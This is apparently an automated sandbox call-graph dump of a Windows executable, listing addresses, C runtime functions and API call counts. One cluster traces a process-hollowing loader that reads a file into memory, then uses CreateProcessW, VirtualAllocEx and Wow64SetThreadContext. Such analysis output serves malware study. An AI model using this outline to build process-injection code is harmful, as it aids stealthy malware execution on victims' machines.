_memcpy_s 58 API calls 8321->8324 8326 f2bfa7 __fptostr 58 API calls 8322->8326 8327 f21e89 _memcpy_s 9 API calls 8323->8327 8325 f2b16e 8324->8325 8328 f21e89 _memcpy_s 9 API calls 8325->8328 8329 f2b1a8 8326->8329 8330 f2b15a 8327->8330 8328->8330 8329->8330 8332 f2b1ee 8329->8332 8335 f2b1c8 8329->8335 8331 f25770 __crtLCMapStringA_stat 6 API calls 8330->8331 8334 f2b214 8331->8334 8417 f2ad4d 8332->8417 8334->8287 8336 f2af6c __cftof2_l 58 API calls 8335->8336 8336->8330 8338 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8337->8338 8339 f2a9f8 8338->8339 8340 f2aa0f 8339->8340 8341 f2aa18 8339->8341 8342 f21cc3 _memcpy_s 58 API calls 8340->8342 8343 f2aa21 8341->8343 8347 f2aa35 8341->8347 8344 f2aa14 8342->8344 8345 f21cc3 _memcpy_s 58 API calls 8343->8345 8346 f21e89 _memcpy_s 9 API calls 8344->8346 8345->8344 8349 f2aa30 _memset __alldvrm __cftoa_l _strrchr 8346->8349 8347->8349 8449 f2ad2f 8347->8449 8349->8287 8351 f2c11f __fltout2 58 API calls 8350->8351 8352 f2aed0 8351->8352 8353 f2aee7 8352->8353 8354 f2aed7 8352->8354 8356 f2aef8 8353->8356 8357 f2aeee 8353->8357 8355 f21cc3 _memcpy_s 58 API calls 8354->8355 8358 f2aedc 8355->8358 8360 f2bfa7 __fptostr 58 API calls 8356->8360 8359 f21cc3 _memcpy_s 58 API calls 8357->8359 8361 f21e89 _memcpy_s 9 API calls 8358->8361 8359->8358 8362 f2af38 8360->8362 8363 f2aee3 8361->8363 8362->8363 8364 f2ad4d __cftoe2_l 58 API calls 8362->8364 8365 f25770 __crtLCMapStringA_stat 6 API calls 8363->8365 8364->8363 8366 f2af68 8365->8366 8366->8287 8368 f2c148 ___dtold 8367->8368 8395 f2c3bd 8368->8395 8373 f2c1a0 8375 f21e99 __invoke_watson 8 API calls 8373->8375 8374 f2c18a 8376 f25770 __crtLCMapStringA_stat 6 API calls 8374->8376 8377 f2c1ac 8375->8377 8378 f2b086 8376->8378 8378->8299 8378->8300 8380 f2bfb9 8379->8380 8381 f2bfcf 8379->8381 8382 f21cc3 _memcpy_s 58 API calls 8380->8382 8381->8380 8385 f2bfd5 8381->8385 8383 f2bfbe 8382->8383 8384 f21e89 _memcpy_s 9 API calls 8383->8384 8387 f2bfc8 _memmove _strlen 8384->8387 8386 f21cc3 _memcpy_s 58 API calls 8385->8386 8385->8387 8386->8383 8387->8310 8389 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8388->8389 8390 f2af89 8389->8390 8391 f21cc3 _memcpy_s 58 API calls 8390->8391 8394 f2afa5 _memset __shift 8390->8394 8392 f2af9b 8391->8392 8393 f21e89 _memcpy_s 9 API calls 8392->8393 8393->8394 8394->8311 8396 f2c412 8395->8396 8397 f2c484 8396->8397 8401 f2c49d 8396->8401 8407 f2c424 8396->8407 8400 f2b7bd __cftoe2_l 58 API calls 8397->8400 8398 f25770 __crtLCMapStringA_stat 6 API calls 8399 f2c163 8398->8399 8408 f2b7bd 8399->8408 8400->8407 8403 f2b7bd __cftoe2_l 58 API calls 8401->8403 8402 f2cd59 8404 f21e99 __invoke_watson 8 API calls 8402->8404 8403->8407 8405 f2cd90 8404->8405 8406 f2c435 8406->8398 8407->8402 8407->8406 8409 f2b7d6 8408->8409 8410 f2b7c8 8408->8410 8411 f21cc3 _memcpy_s 58 API calls 8409->8411 8410->8409 8413 f2b7ec 8410->8413 8412 f2b7dd 8411->8412 8414 f21e89 _memcpy_s 9 API calls 8412->8414 8415 f2b7e7 8413->8415 8416 f21cc3 _memcpy_s 58 API calls 8413->8416 8414->8415 8415->8373 8415->8374 8416->8412 8418 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8417->8418 8419 f2ad60 8418->8419 8420 f2ad6d 8419->8420 8421 f2ad76 8419->8421 8422 f21cc3 _memcpy_s 58 API calls 8420->8422 8424 f2ad8b 8421->8424 8427 f2ad9f __shift 8421->8427 8423 f2ad72 8422->8423 8426 f21e89 _memcpy_s 9 API calls 8423->8426 8425 f21cc3 _memcpy_s 58 API calls 8424->8425 8425->8423 8433 f2ad9a _memmove 8426->8433 8428 f2b7bd __cftoe2_l 58 API calls 8427->8428 8429 f2ae16 8428->8429 8430 f21e99 __invoke_watson 8 API calls 8429->8430 8429->8433 8431 f2ae9d 8430->8431 8432 f2c11f __fltout2 58 API calls 8431->8432 8434 f2aed0 8432->8434 8433->8330 8435 f2aee7 8434->8435 8436 f2aed7 8434->8436 8438 f2aef8 8435->8438 8439 f2aeee 8435->8439 8437 f21cc3 _memcpy_s 58 API calls 8436->8437 8440 f2aedc 8437->8440 8442 f2bfa7 __fptostr 58 API calls 8438->8442 8441 f21cc3 _memcpy_s 58 API calls 8439->8441 8443 f21e89 _memcpy_s 9 API calls 8440->8443 8441->8440 8444 f2af38 8442->8444 8445 f2aee3 8443->8445 8444->8445 8446 f2ad4d __cftoe2_l 58 API calls 8444->8446 8447 f25770 __crtLCMapStringA_stat 6 API calls 8445->8447 8446->8445 8448 f2af68 8447->8448 8448->8330 8450 f2ae9e __cftoe_l 58 API calls 8449->8450 8451 f2ad48 8450->8451 8451->8349 7719 160809 7731 1606f7 GetPEB 7719->7731 7721 16086e 7722 16098e CreateFileW 7721->7722 7723 1609b5 7722->7723 7724 1609b3 7722->7724 7723->7724 7725 1609c8 VirtualAlloc 7723->7725 7725->7724 7726 1609e2 ReadFile 7725->7726 7726->7724 7727 1609fa CloseHandle 7726->7727 7728 160a0b 7727->7728 7732 160cdb 7728->7732 7731->7721 7746 1606f7 GetPEB 7732->7746 7734 160d32 7735 160e1d 7734->7735 7737 160e2a 7734->7737 7745 160a16 ExitProcess 7734->7745 7747 161001 7735->7747 7737->7745 7768 160261 7737->7768 7739 160f9d 7742 160261 11 API calls 7739->7742 7740 160f30 7740->7739 7741 160261 11 API calls 7740->7741 7740->7745 7741->7740 7743 160fbc 7742->7743 7743->7745 7777 1601b2 7743->7777 7746->7734 7786 1606f7 GetPEB 7747->7786 7749 16100f 7750 16113d CreateProcessW 7749->7750 7767 161118 7749->7767 7751 161154 7750->7751 7750->7767 7752 161177 ReadProcessMemory 7751->7752 7751->7767 7753 16119b 7752->7753 7752->7767 7754 1611ce VirtualAllocEx 7753->7754 7787 160360 7753->7787 7755 1611f8 7754->7755 7754->7767 7757 160261 11 API calls 7755->7757 7759 16120e 7757->7759 7758 1611c2 7758->7754 7758->7767 7760 161268 7759->7760 7761 160261 11 API calls 7759->7761 7759->7767 7762 160261 11 API calls 7760->7762 7761->7759 7763 161282 7762->7763 7764 16128b Wow64SetThreadContext 7763->7764 7763->7767 7765 1612b0 7764->7765 7764->7767 7766 1601b2 11 API calls 7765->7766 7766->7767 7767->7745 7769 16027c 7768->7769 7770 160736 GetPEB 7769->7770 7771 16029d 7770->7771 7772 1602a5 7771->7772 7773 16032f 7771->7773 7775 1603f8 10 API calls 7772->7775 7821 16017c 7773->7821 7776 160316 7775->7776 7776->7740 7778 1601cd 7777->7778 7779 160736 GetPEB 7778->7779 7780 1601ee 7779->7780 7781 1601f2 7780->7781 7782 160238 7780->7782 7783 1603f8 10 API calls 7781->7783 7824 16018e 7782->7824 7785 16022d 7783->7785 7785->7745 7786->7749 7788 160373 7787->7788 7796 160736 GetPEB 7788->7796 7790 160394 7791 1603de 7790->7791 7792 160398 7790->7792 7812 1601a0 7791->7812 7798 1603f8 GetPEB 7792->7798 7795 1603d3 7795->7758 7797 160759 7796->7797 7797->7790 7799 16045d 7798->7799 7815 160772 GetPEB 7799->7815 7802 1604e9 7803 1604f9 VirtualAlloc 7802->7803 7804 1605c2 7802->7804 7803->7804 7805 16050f ReadFile 7803->7805 7806 160614 7804->7806 7807 160609 VirtualFree 7804->7807 7805->7804 7808 160524 VirtualAlloc 7805->7808 7806->7795 7807->7806 7808->7804 7809 160547 7808->7809 7809->7804 7810 1605b1 VirtualFree 7809->7810 7811 1605ad CloseHandle 7809->7811 7810->7804 7811->7810 7813 1603f8 10 API calls 7812->7813 7814 1601aa 7813->7814 7814->7795 7816 160785 7815->7816 7818 1604da CreateFileW 7816->7818 7819 16061d GetPEB 7816->7819 7818->7802 7818->7804 7820 16064d 7819->7820 7820->7816 7822 1603f8 10 API calls 7821->7822 7823 160186 7822->7823 7823->7776 7825 1603f8 10 API calls 7824->7825 7826 160198 7825->7826 7826->7785 7914 f216d3 7917 f2344b 7914->7917 7918 f236f3 __getptd_noexit 58 API calls 7917->7918 7919 f216e4 7918->7919 7920 f293d0 7921 f293e6 7920->7921 7922 f293da 7920->7922 7922->7921 7923 f293df CloseHandle 7922->7923 7923->7921 8452 f22690 8453 f226a2 8452->8453 8455 f226b0 @_EH4_CallFilterFunc@8 8452->8455 8454 f25770 __crtLCMapStringA_stat 6 API calls 8453->8454 8454->8455 7924 f24bdf 7927 f24fc3 7924->7927 7926 f24bee 7928 f24fcf __wsopen_helper 7927->7928 7929 f236db __setmbcp 58 API calls 7928->7929 7930 f24fd7 7929->7930 7931 f24f1d __setmbcp 58 API calls 7930->7931 7932 f24fe1 7931->7932 7952 f24cbe 7932->7952 7935 f248b1 __malloc_crt 58 API calls 7936 f25003 7935->7936 7937 f25130 __wsopen_helper 7936->7937 7959 f2516b 7936->7959 7937->7926 7940 f25140 7940->7937 7943 f25153 7940->7943 7945 f24831 _free 58 API calls 7940->7945 7941 f25039 7942 f25059 7941->7942 7944 f24831 _free 58 API calls 7941->7944 7942->7937 7947 f2442f __lock 58 API calls 7942->7947 7946 f21cc3 _memcpy_s 58 API calls 7943->7946 7944->7942 7945->7943 7946->7937 7949 f25088 7947->7949 7948 f25116 7969 f25135 7948->7969 7949->7948 7951 f24831 _free 58 API calls 7949->7951 7951->7948 7953 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7952->7953 7954 f24cce 7953->7954 7955 f24cef 7954->7955 7956 f24cdd GetOEMCP 7954->7956 7957 f24d06 7955->7957 7958 f24cf4 GetACP 7955->7958 7956->7957 7957->7935 7957->7937 7958->7957 7960 f24cbe getSystemCP 60 API calls 7959->7960 7961 f25188 7960->7961 7964 f251d9 IsValidCodePage 7961->7964 7966 f2518f setSBCS 7961->7966 7968 f251fe _memset __setmbcp_nolock 7961->7968 7962 f25770 __crtLCMapStringA_stat 6 API calls 7963 f2502a 7962->7963 7963->7940 7963->7941 7965 f251eb GetCPInfo 7964->7965 7964->7966 7965->7966 7965->7968 7966->7962 7972 f24d8b GetCPInfo 7968->7972 8038 f24599 LeaveCriticalSection 7969->8038 7971 f2513c 7971->7937 7978 f24dc3 7972->7978 7981 f24e6d 7972->7981 7974 f25770 __crtLCMapStringA_stat 6 API calls 7977 f24f19 7974->7977 7977->7966 7982 f27a55 7978->7982 7980 f27917 ___crtLCMapStringA 62 API calls 7980->7981 7981->7974 7983 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7982->7983 7984 f27a66 7983->7984 7992 f2795d 7984->7992 7987 f27917 7988 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7987->7988 7989 f27928 7988->7989 8009 f27713 7989->8009 7993 f27977 7992->7993 7994 f27984 MultiByteToWideChar 7992->7994 7993->7994 7995 f279b0 7994->7995 8004 f279a9 7994->8004 7998 f2114b _malloc 58 API calls 7995->7998 8002 f279d2 _memset __crtLCMapStringA_stat 7995->8002 7996 f25770 __crtLCMapStringA_stat 6 API calls 7997 f24e24 7996->7997 7997->7987 7998->8002 7999 f27a0e MultiByteToWideChar 8000 f27a38 7999->8000 8001 f27a28 GetStringTypeW 7999->8001 8005 f275c3 8000->8005 8001->8000 8002->7999 8002->8004 8004->7996 8006 f275de 8005->8006 8007 f275cd 8005->8007 8006->8004 8007->8006 8008 f24831 _free 58 API calls 8007->8008 8008->8006 8011 f2772c MultiByteToWideChar 8009->8011 8012 f2778b 8011->8012 8016 f27792 8011->8016 8013 f25770 __crtLCMapStringA_stat 6 API calls 8012->8013 8014 f24e45 8013->8014 8014->7980 8015 f277f1 MultiByteToWideChar 8017 f2780a 8015->8017 8033 f27858 8015->8033 8018 f2114b _malloc 58 API calls 8016->8018 8021 f277ba __crtLCMapStringA_stat 8016->8021 8034 f27659 8017->8034 8018->8021 8020 f275c3 __crtLCMapStringA_stat 58 API calls 8020->8012 8021->8012 8021->8015 8022 f2781e 8023 f27834 8022->8023 8025 f27860 8022->8025 8022->8033 8024 f27659 __crtLCMapStringA_stat LCMapStringW 8023->8024 8023->8033 8024->8033 8027 f27888 __crtLCMapStringA_stat 8025->8027 8028 f2114b _malloc 58 API calls 8025->8028 8026 f27659 __crtLCMapStringA_stat LCMapStringW 8030 f278cb 8026->8030 8027->8026 8027->8033 8028->8027 8029 f278f3 8031 f275c3 __crtLCMapStringA_stat 58 API calls 8029->8031 8030->8029 8032 f278e5 WideCharToMultiByte 8030->8032 8031->8033 8032->8029 8033->8020 8035 f27684 __crtLCMapStringA_stat 8034->8035 8036 f27669 8034->8036 8037 f2769b LCMapStringW 8035->8037 8036->8022 8037->8022 8038->7971 8466 f23283 IsProcessorFeaturePresent 8467 f232a9 8466->8467 8468 f2b303 8471 f2b314 8468->8471 8472 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8471->8472 8473 f2b326 8472->8473 8480 f2b791 8473->8480 8475 f2b346 8477 f2b791 __forcdecpt_l 65 API calls 8475->8477 8479 f2b310 8477->8479 8478 f2b332 8478->8475 8485 f2b623 8478->8485 8481 f2b7af 8480->8481 8482 f2b79d 8480->8482 8490 f2b64e 8481->8490 8482->8478 8486 f2b640 8485->8486 8487 f2b62f 8485->8487 8512 f2b5d1 8486->8512 8487->8478 8491 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8490->8491 8492 f2b661 8491->8492 8493 f2b6cd 8492->8493 8494 f2b66d 8492->8494 8499 f2b6eb 8493->8499 8509 f2917b 8493->8509 8501 f2b682 8494->8501 8502 f2c30c 8494->8502 8496 f21cc3 _memcpy_s 58 API calls 8498 f2b6f1 8496->8498 8500 f27917 ___crtLCMapStringA 62 API calls 8498->8500 8499->8496 8499->8498 8500->8501 8501->8478 8503 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8502->8503 8504 f2c31e 8503->8504 8505 f2c32b 8504->8505 8506 f2917b __isleadbyte_l 58 API calls 8504->8506 8505->8501 8507 f2c34f 8506->8507 8508 f27a55 ___crtGetStringTypeA 61 API calls 8507->8508 8508->8505 8510 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8509->8510 8511 f2918c 8510->8511 8511->8499 8513 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8512->8513 8514 f2b5e2 8513->8514 8515 f2c30c __isctype_l 61 API calls 8514->8515 8516 f2b5f9 8514->8516 8515->8516 8516->8478 6474 f215c0 6475 f215cc __wsopen_helper 6474->6475 6511 f2407f GetStartupInfoW 6475->6511 6477 f215d1 6513 f21d17 GetProcessHeap 6477->6513 6479 f21629 6480 f21634 6479->6480 6593 f21710 6479->6593 6514 f23815 6480->6514 6483 f2163a 6484 f21645 __RTC_Initialize 6483->6484 6485 f21710 _fast_error_exit 58 API calls 6483->6485 6535 f238a8 6484->6535 6485->6484 6487 f21654 6488 f21660 GetCommandLineW 6487->6488 6489 f21710 _fast_error_exit 58 API calls 6487->6489 6554 f23fa4 GetEnvironmentStringsW 6488->6554 6491 f2165f 6489->6491 6491->6488 6494 f2167a 6495 f21685 6494->6495 6601 f217be 6494->6601 6564 f23d99 6495->6564 6498 f2168b 6499 f21696 6498->6499 6501 f217be __lock 58 API calls 6498->6501 6578 f217f8 6499->6578 6501->6499 6502 f2169e 6503 f216a9 __wwincmdln 6502->6503 6504 f217be __lock 58 API calls 6502->6504 6584 f21000 6503->6584 6504->6503 6507 f216cc 6611 f217e9 6507->6611 6510 f216d1 __wsopen_helper 6512 f24095 6511->6512 6512->6477 6513->6479 6614 f21890 RtlEncodePointer 6514->6614 6516 f2381a 6620 f24560 6516->6620 6519 f23823 6624 f2388b 6519->6624 6524 f23840 6636 f24869 6524->6636 6526 f23882 6528 f2388b __mtterm 61 API calls 6526->6528 6531 f23887 6528->6531 6530 f23861 6530->6526 6532 f23867 6530->6532 6531->6483 6645 f23762 6532->6645 6534 f2386f GetCurrentThreadId 6534->6483 6536 f238b4 __wsopen_helper 6535->6536 6537 f2442f __lock 58 API calls 6536->6537 6538 f238bb 6537->6538 6539 f24869 __calloc_crt 58 API calls 6538->6539 6540 f238cc 6539->6540 6541 f23937 GetStartupInfoW 6540->6541 6542 f238d7 __wsopen_helper @_EH4_CallFilterFunc@8 6540->6542 6544 f23a7b 6541->6544 6547 f2394c 6541->6547 6542->6487 6543 f23b43 6909 f23b53 6543->6909 6544->6543 6549 f23ac8 GetStdHandle 6544->6549 6550 f23adb GetFileType 6544->6550 6553 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6544->6553 6546 f2399a 6546->6544 6551 f239ce GetFileType 6546->6551 6552 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6546->6552 6547->6544 6547->6546 6548 f24869 __calloc_crt 58 API calls 6547->6548 6548->6547 6549->6544 6550->6544 6551->6546 6552->6546 6553->6544 6555 f23fb5 6554->6555 6556 f21670 6554->6556 6557 f248b1 __malloc_crt 58 API calls 6555->6557 6560 f23b5c GetModuleFileNameW 6556->6560 6558 f23fdb _memmove 6557->6558 6559 f23ff1 FreeEnvironmentStringsW 6558->6559 6559->6556 6561 f23b90 _wparse_cmdline 6560->6561 6562 f248b1 __malloc_crt 58 API calls 6561->6562 6563 f23bd0 _wparse_cmdline 6561->6563 6562->6563 6563->6494 6565 f23db2 __wsetenvp 6564->6565 6566 f23daa 6564->6566 6567 f24869 __calloc_crt 58 API calls 6565->6567 6566->6498 6568 f23ddb __wsetenvp 6567->6568 6568->6566 6570 f23e32 6568->6570 6571 f24869 __calloc_crt 58 API calls 6568->6571 6572 f23e57 6568->6572 6574 f25457 __wsetenvp 58 API calls 6568->6574 6575 f23e6e 6568->6575 6569 f24831 _free 58 API calls 6569->6566 6570->6569 6571->6568 6573 f24831 _free 58 API calls 6572->6573 6573->6566 6574->6568 6576 f21e99 __invoke_watson 8 API calls 6575->6576 6577 f23e7a 6576->6577 6577->6498 6579 f21804 __IsNonwritableInCurrentImage 6578->6579 6913 f24942 6579->6913 6581 f21822 __initterm_e 6583 f21841 _doexit __IsNonwritableInCurrentImage 6581->6583 6916 f2481c 6581->6916 6583->6502 6585 f2114b _malloc 58 API calls 6584->6585 6586 f21013 6585->6586 6982 f211dd 6586->6982 6590 f21088 6590->6507 6608 f21a61 6590->6608 6591 f2104d _memset 6591->6590 6592 f2107f EnumSystemCodePagesW 6591->6592 6592->6590 6594 f21721 6593->6594 6595 f2171c 6593->6595 6597 f21ad2 __NMSG_WRITE 58 API calls 6594->6597 6596 f21a75 __FF_MSGBANNER 58 API calls 6595->6596 6596->6594 6598 f21729 6597->6598 6599 f217a8 _fast_error_exit 3 API calls 6598->6599 6600 f21733 6599->6600 6600->6480 6602 f21a75 __FF_MSGBANNER 58 API calls 6601->6602 6603 f217c6 6602->6603 6604 f21ad2 __NMSG_WRITE 58 API calls 6603->6604 6605 f217ce 6604->6605 7689 f2187c 6605->7689 6609 f21932 _doexit 58 API calls 6608->6609 6610 f21a70 6609->6610 6610->6507 6612 f21932 _doexit 58 API calls 6611->6612 6613 f217f4 6612->6613 6613->6510 6655 f21767 6614->6655 6616 f218a1 __init_pointers __initp_misc_winsig 6656 f24995 EncodePointer 6616->6656 6618 f218b9 __init_pointers 6619 f24110 34 API calls 6618->6619 6619->6516 6621 f2456c 6620->6621 6623 f2381f 6621->6623 6657 f240a2 6621->6657 6623->6519 6633 f24001 6623->6633 6625 f23895 6624->6625 6627 f2389b 6624->6627 6660 f2401f 6625->6660 6628 f24479 DeleteCriticalSection 6627->6628 6629 f24495 6627->6629 6663 f24831 6628->6663 6631 f244a1 DeleteCriticalSection 6629->6631 6632 f23828 6629->6632 6631->6629 6632->6483 6634 f24018 TlsAlloc 6633->6634 6635 f23835 6633->6635 6635->6519 6635->6524 6638 f24870 6636->6638 6639 f2384d 6638->6639 6641 f2488e 6638->6641 6689 f274fd 6638->6689 6639->6526 6642 f2405d 6639->6642 6641->6638 6641->6639 6697 f243a9 Sleep 6641->6697 6643 f24073 6642->6643 6644 f24077 TlsSetValue 6642->6644 6643->6530 6644->6530 6646 f2376e __wsopen_helper 6645->6646 6700 f2442f 6646->6700 6648 f237ab 6707 f23803 6648->6707 6651 f2442f __lock 58 API calls 6652 f237cc ___addlocaleref 6651->6652 6710 f2380c 6652->6710 6654 f237f7 __wsopen_helper 6654->6534 6655->6616 6656->6618 6658 f240b2 6657->6658 6659 f240bf InitializeCriticalSectionAndSpinCount 6657->6659 6658->6621 6659->6621 6661 f24032 6660->6661 6662 f24036 TlsFree 6660->6662 6661->6627 6662->6627 6664 f2483a HeapFree 6663->6664 6668 f24863 __dosmaperr 6663->6668 6665 f2484f 6664->6665 6664->6668 6669 f21cc3 6665->6669 6668->6627 6672 f236f3 GetLastError 6669->6672 6671 f21cc8 GetLastError 6671->6668 6686 f2403e 6672->6686 6674 f23708 6675 f23756 SetLastError 6674->6675 6676 f24869 __calloc_crt 55 API calls 6674->6676 6675->6671 6677 f2371b 6676->6677 6677->6675 6678 f2405d __getptd_noexit TlsSetValue 6677->6678 6679 f2372f 6678->6679 6680 f23735 6679->6680 6681 f2374d 6679->6681 6682 f23762 __initptd 55 API calls 6680->6682 6683 f24831 _free 55 API calls 6681->6683 6685 f2373d GetCurrentThreadId 6682->6685 6684 f23753 6683->6684 6684->6675 6685->6675 6687 f24051 6686->6687 6688 f24055 TlsGetValue 6686->6688 6687->6674 6688->6674 6690 f27508 6689->6690 6694 f27523 6689->6694 6691 f27514 6690->6691 6690->6694 6692 f21cc3 _memcpy_s 57 API calls 6691->6692 6695 f27519 6692->6695 6693 f27533 HeapAlloc 6693->6694 6693->6695 6694->6693 6694->6695 6698 f21741 DecodePointer 6694->6698 6695->6638 6697->6641 6699 f21754 6698->6699 6699->6694 6701 f24453 EnterCriticalSection 6700->6701 6702 f24440 6700->6702 6701->6648 6713 f244b7 6702->6713 6704 f24446 6704->6701 6705 f217be __lock 57 API calls 6704->6705 6706 f24452 6705->6706 6706->6701 6907 f24599 LeaveCriticalSection 6707->6907 6709 f237c5 6709->6651 6908 f24599 LeaveCriticalSection 6710->6908 6712 f23813 6712->6654 6714 f244c3 __wsopen_helper 6713->6714 6715 f244e4 6714->6715 6716 f244cc 6714->6716 6724 f24505 __wsopen_helper 6715->6724 6779 f248b1 6715->6779 6737 f21a75 6716->6737 6722 f24500 6727 f21cc3 _memcpy_s 58 API calls 6722->6727 6723 f2450f 6728 f2442f __lock 58 API calls 6723->6728 6724->6704 6727->6724 6730 f24516 6728->6730 6731 f24523 6730->6731 6732 f2453b 6730->6732 6734 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6731->6734 6733 f24831 _free 58 API calls 6732->6733 6735 f2452f 6733->6735 6734->6735 6785 f24557 6735->6785 6788 f23e88 6737->6788 6739 f21a7c 6740 f21a89 6739->6740 6741 f23e88 __FF_MSGBANNER 58 API calls 6739->6741 6742 f21ad2 __NMSG_WRITE 58 API calls 6740->6742 6744 f21aab 6740->6744 6741->6740 6743 f21aa1 6742->6743 6745 f21ad2 __NMSG_WRITE 58 API calls 6743->6745 6746 f21ad2 6744->6746 6745->6744 6747 f21af0 __NMSG_WRITE 6746->6747 6749 f23e88 __FF_MSGBANNER 55 API calls 6747->6749 6775 f21c17 6747->6775 6751 f21b03 6749->6751 6750 f21c80 6776 f217a8 6750->6776 6752 f21c1c GetStdHandle 6751->6752 6753 f23e88 __FF_MSGBANNER 55 API calls 6751->6753 6756 f21c2a _strlen 6752->6756 6752->6775 6754 f21b14 6753->6754 6754->6752 6755 f21b26 6754->6755 6755->6775 6818 f25457 6755->6818 6759 f21c63 WriteFile 6756->6759 6756->6775 6759->6775 6760 f21b53 GetModuleFileNameW 6762 f21b73 6760->6762 6768 f21b83 __wsetenvp 6760->6768 6761 f21c84 6763 f21e99 __invoke_watson 8 API calls 6761->6763 6764 f25457 __wsetenvp 55 API calls 6762->6764 6765 f21c8e 6763->6765 6764->6768 6768->6761 6771 f21bc9 6768->6771 6827 f254cc 6768->6827 6770 f253eb __NMSG_WRITE 55 API calls 6772 f21c00 6770->6772 6771->6761 6836 f253eb 6771->6836 6772->6761 6773 f21c07 6772->6773 6845 f2558a EncodePointer 6773->6845 6870 f25770 6775->6870 6885 f21774 GetModuleHandleExW 6776->6885 6780 f248bf 6779->6780 6782 f244f9 6780->6782 6784 f248d2 6780->6784 6888 f2114b 6780->6888 6782->6722 6782->6723 6784->6780 6784->6782 6905 f243a9 Sleep 6784->6905 6906 f24599 LeaveCriticalSection 6785->6906 6787 f2455e 6787->6724 6789 f23e92 6788->6789 6790 f21cc3 _memcpy_s 58 API calls 6789->6790 6791 f23e9c 6789->6791 6792 f23eb8 6790->6792 6791->6739 6795 f21e89 6792->6795 6798 f21e5e DecodePointer 6795->6798 6799 f21e71 6798->6799 6804 f21e99 IsProcessorFeaturePresent 6799->6804 6802 f21e5e _memcpy_s 8 API calls 6803 f21e95 6802->6803 6803->6739 6805 f21ea4 6804->6805 6810 f21d2c 6805->6810 6809 f21e88 6809->6802 6811 f21d46 _memset __call_reportfault 6810->6811 6812 f21d66 IsDebuggerPresent 6811->6812 6813 f243cc __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 6812->6813 6815 f21e2a __call_reportfault 6813->6815 6814 f25770 __crtLCMapStringA_stat 6 API calls 6816 f21e4d 6814->6816 6815->6814 6817 f243b7 GetCurrentProcess TerminateProcess 6816->6817 6817->6809 6819 f25470 6818->6819 6820 f25462 6818->6820 6821 f21cc3 _memcpy_s 58 API calls 6819->6821 6820->6819 6825 f25489 6820->6825 6822 f2547a 6821->6822 6823 f21e89 _memcpy_s 9 API calls 6822->6823 6824 f21b46 6823->6824 6824->6760 6824->6761 6825->6824 6826 f21cc3 _memcpy_s 58 API calls 6825->6826 6826->6822 6831 f254da 6827->6831 6828 f254de 6829 f21cc3 _memcpy_s 58 API calls 6828->6829 6830 f254e3 6828->6830 6835 f2550e 6829->6835 6830->6771 6831->6828 6831->6830 6833 f2551d 6831->6833 6832 f21e89 _memcpy_s 9 API calls 6832->6830 6833->6830 6834 f21cc3 _memcpy_s 58 API calls 6833->6834 6834->6835 6835->6832 6837 f25405 6836->6837 6839 f253f7 6836->6839 6838 f21cc3 _memcpy_s 58 API calls 6837->6838 6844 f2540f 6838->6844 6839->6837 6842 f25431 6839->6842 6840 f21e89 _memcpy_s 9 API calls 6841 f21be9 6840->6841 6841->6761 6841->6770 6842->6841 6843 f21cc3 _memcpy_s 58 API calls 6842->6843 6843->6844 6844->6840 6846 f255be ___crtIsPackagedApp 6845->6846 6847 f2567d IsDebuggerPresent 6846->6847 6848 f255cd LoadLibraryExW 6846->6848 6851 f256a2 6847->6851 6852 f25687 6847->6852 6849 f255e4 GetLastError 6848->6849 6850 f2560a GetProcAddress 6848->6850 6854 f255f3 LoadLibraryExW 6849->6854 6858 f2569a 6849->6858 6855 f2561e 7 API calls 6850->6855 6850->6858 6853 f256a7 DecodePointer 6851->6853 6856 f25695 6851->6856 6852->6856 6857 f2568e OutputDebugStringW 6852->6857 6853->6858 6854->6850 6854->6858 6859 f25666 GetProcAddress EncodePointer 6855->6859 6860 f2567a 6855->6860 6856->6858 6864 f256ce DecodePointer DecodePointer 6856->6864 6868 f256e6 6856->6868 6857->6856 6861 f25770 __crtLCMapStringA_stat 6 API calls 6858->6861 6859->6860 6860->6847 6865 f2576c 6861->6865 6862 f2570a DecodePointer 6862->6858 6863 f2571e DecodePointer 6863->6862 6866 f25725 6863->6866 6864->6868 6865->6775 6866->6862 6869 f25736 DecodePointer 6866->6869 6868->6862 6868->6863 6869->6862 6871 f2577a IsProcessorFeaturePresent 6870->6871 6872 f25778 6870->6872 6874 f27ae6 6871->6874 6872->6750 6877 f27a95 IsDebuggerPresent 6874->6877 6878 f27aaa __call_reportfault 6877->6878 6883 f243cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6878->6883 6880 f27ab2 __call_reportfault 6884 f243b7 GetCurrentProcess TerminateProcess 6880->6884 6882 f27acf 6882->6750 6883->6880 6884->6882 6886 f2179f ExitProcess 6885->6886 6887 f2178d GetProcAddress 6885->6887 6887->6886 6889 f211c6 6888->6889 6897 f21157 6888->6897 6890 f21741 _malloc DecodePointer 6889->6890 6891 f211cc 6890->6891 6893 f21cc3 _memcpy_s 57 API calls 6891->6893 6892 f21a75 __FF_MSGBANNER 57 API calls 6898 f21162 6892->6898 6904 f211be 6893->6904 6894 f2118a RtlAllocateHeap 6894->6897 6894->6904 6895 f21ad2 __NMSG_WRITE 57 API calls 6895->6898 6896 f211b2 6900 f21cc3 _memcpy_s 57 API calls 6896->6900 6897->6894 6897->6896 6897->6898 6899 f21741 _malloc DecodePointer 6897->6899 6902 f211b0 6897->6902 6898->6892 6898->6895 6898->6897 6901 f217a8 _fast_error_exit 3 API calls 6898->6901 6899->6897 6900->6902 6901->6898 6903 f21cc3 _memcpy_s 57 API calls 6902->6903 6903->6904 6904->6780 6905->6784 6906->6787 6907->6709 6908->6712 6912 f24599 LeaveCriticalSection 6909->6912 6911 f23b5a 6911->6542 6912->6911 6914 f24945 EncodePointer 6913->6914 6914->6914 6915 f2495f 6914->6915 6915->6581 6919 f24720 6916->6919 6918 f24827 6918->6583 6920 f2472c __wsopen_helper 6919->6920 6927 f21920 